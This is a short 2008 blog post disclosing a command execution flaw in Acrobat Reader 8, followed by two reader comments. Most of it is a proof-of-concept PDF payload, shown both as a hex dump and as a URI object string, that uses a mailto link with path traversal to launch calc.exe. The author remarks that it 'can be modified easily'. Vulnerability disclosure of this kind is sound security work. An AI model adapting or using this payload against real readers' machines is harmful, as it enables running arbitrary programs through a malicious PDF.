jueves, abril 24, 2008

Interesting "feature" of AcroRead

Acroread8 is vulnerable to a command execution, is possible at URI tag, to make a local path to the file you want to be executed.
get the exploit
This exploit executes the windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|
<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>

Conclusion: don't trust in any file given from unknown people :)

2 comentarios:

Anónimo dijo...

That is old.

Jesús dijo...

I'm still vulnerable :) I have to upgrade, and people should too.